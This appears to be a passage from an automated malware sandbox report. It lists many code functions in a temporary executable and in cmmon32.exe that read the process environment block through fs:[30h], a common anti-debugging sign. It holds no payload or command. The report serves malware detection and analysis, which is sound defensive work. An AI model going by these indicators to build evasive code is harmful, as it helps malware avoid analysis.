Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h] 3_2_00A76C0A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h] 3_2_00A76C0A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h] 3_2_00A76C0A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h] 3_2_00A76C0A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1746D mov eax, dword ptr fs:[00000030h] 3_2_00A1746D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2A44B mov eax, dword ptr fs:[00000030h] 3_2_00A2A44B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h] 3_2_00A8C450
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h] 3_2_00A8C450
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h] 3_2_00AC05AC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h] 3_2_00AC05AC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A235A1 mov eax, dword ptr fs:[00000030h] 3_2_00A235A1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h] 3_2_009F2D8A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h] 3_2_009F2D8A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h] 3_2_009F2D8A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h] 3_2_009F2D8A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h] 3_2_009F2D8A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A21DB5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A21DB5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A21DB5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h] 3_2_00A22581
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h] 3_2_00A22581
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h] 3_2_00A22581
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h] 3_2_00A22581
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AB2D82
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AB2D82
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AB2D82
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AB2D82
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AB2D82
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AB2D82
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AB2D82
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A2FD9B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A2FD9B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A0D5E0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A0D5E0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ABFDE2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ABFDE2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ABFDE2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ABFDE2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA8DF1 mov eax, dword ptr fs:[00000030h] 3_2_00AA8DF1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A76DC9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A76DC9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A76DC9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00A76DC9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A76DC9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A76DC9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A7A537 mov eax, dword ptr fs:[00000030h] 3_2_00A7A537
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABE539 mov eax, dword ptr fs:[00000030h] 3_2_00ABE539
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC8D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h] 3_2_00A24D3B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h] 3_2_00A24D3B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h] 3_2_00A24D3B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FAD30 mov eax, dword ptr fs:[00000030h] 3_2_009FAD30
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1C577 mov eax, dword ptr fs:[00000030h] 3_2_00A1C577
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1C577 mov eax, dword ptr fs:[00000030h] 3_2_00A1C577
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A33D43 mov eax, dword ptr fs:[00000030h] 3_2_00A33D43
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A73540 mov eax, dword ptr fs:[00000030h] 3_2_00A73540
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA3D40 mov eax, dword ptr fs:[00000030h] 3_2_00AA3D40
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A17D50 mov eax, dword ptr fs:[00000030h] 3_2_00A17D50
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A746A7 mov eax, dword ptr fs:[00000030h] 3_2_00A746A7
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AC0EA5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AC0EA5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AC0EA5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8FE87 mov eax, dword ptr fs:[00000030h] 3_2_00A8FE87
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A216E0 mov ecx, dword ptr fs:[00000030h] 3_2_00A216E0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A076E2 mov eax, dword ptr fs:[00000030h] 3_2_00A076E2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A38EC7 mov eax, dword ptr fs:[00000030h] 3_2_00A38EC7
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAFEC0 mov eax, dword ptr fs:[00000030h] 3_2_00AAFEC0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A236CC mov eax, dword ptr fs:[00000030h] 3_2_00A236CC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8ED6 mov eax, dword ptr fs:[00000030h] 3_2_00AC8ED6
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAFE3F mov eax, dword ptr fs:[00000030h] 3_2_00AAFE3F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h] 3_2_009FC600
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h] 3_2_009FC600
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h] 3_2_009FC600
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A28E00 mov eax, dword ptr fs:[00000030h] 3_2_00A28E00
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1608 mov eax, dword ptr fs:[00000030h] 3_2_00AB1608
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h] 3_2_00A2A61C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h] 3_2_00A2A61C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FE620 mov eax, dword ptr fs:[00000030h] 3_2_009FE620
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0766D mov eax, dword ptr fs:[00000030h] 3_2_00A0766D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A1AE73
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A1AE73
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A1AE73
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A1AE73
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A1AE73
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h] 3_2_00A07E41
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h] 3_2_00A07E41
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h] 3_2_00A07E41
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h] 3_2_00A07E41
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h] 3_2_00A07E41
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h] 3_2_00A07E41
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABAE44 mov eax, dword ptr fs:[00000030h] 3_2_00ABAE44
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABAE44 mov eax, dword ptr fs:[00000030h] 3_2_00ABAE44
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h] 3_2_00A77794
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h] 3_2_00A77794
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h] 3_2_00A77794
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A08794 mov eax, dword ptr fs:[00000030h] 3_2_00A08794
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A337F5 mov eax, dword ptr fs:[00000030h] 3_2_00A337F5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2E730 mov eax, dword ptr fs:[00000030h] 3_2_00A2E730
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B73D mov eax, dword ptr fs:[00000030h] 3_2_00A1B73D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B73D mov eax, dword ptr fs:[00000030h] 3_2_00A1B73D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC070D mov eax, dword ptr fs:[00000030h] 3_2_00AC070D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC070D mov eax, dword ptr fs:[00000030h] 3_2_00AC070D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2A70E mov eax, dword ptr fs:[00000030h] 3_2_00A2A70E
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2A70E mov eax, dword ptr fs:[00000030h] 3_2_00A2A70E
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F4F2E mov eax, dword ptr fs:[00000030h] 3_2_009F4F2E
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F4F2E mov eax, dword ptr fs:[00000030h] 3_2_009F4F2E
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1F716 mov eax, dword ptr fs:[00000030h] 3_2_00A1F716
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8FF10 mov eax, dword ptr fs:[00000030h] 3_2_00A8FF10
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8FF10 mov eax, dword ptr fs:[00000030h] 3_2_00A8FF10
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0FF60 mov eax, dword ptr fs:[00000030h] 3_2_00A0FF60
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8F6A mov eax, dword ptr fs:[00000030h] 3_2_00AC8F6A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0EF40 mov eax, dword ptr fs:[00000030h] 3_2_00A0EF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0457C450 mov eax, dword ptr fs:[00000030h] 5_2_0457C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0457C450 mov eax, dword ptr fs:[00000030h] 5_2_0457C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451A44B mov eax, dword ptr fs:[00000030h] 5_2_0451A44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450746D mov eax, dword ptr fs:[00000030h] 5_2_0450746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B740D mov eax, dword ptr fs:[00000030h] 5_2_045B740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B740D mov eax, dword ptr fs:[00000030h] 5_2_045B740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B740D mov eax, dword ptr fs:[00000030h] 5_2_045B740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h] 5_2_04566C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h] 5_2_04566C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h] 5_2_04566C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h] 5_2_04566C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451BC2C mov eax, dword ptr fs:[00000030h] 5_2_0451BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B8CD6 mov eax, dword ptr fs:[00000030h] 5_2_045B8CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A14FB mov eax, dword ptr fs:[00000030h] 5_2_045A14FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566CF0 mov eax, dword ptr fs:[00000030h] 5_2_04566CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566CF0 mov eax, dword ptr fs:[00000030h] 5_2_04566CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566CF0 mov eax, dword ptr fs:[00000030h] 5_2_04566CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
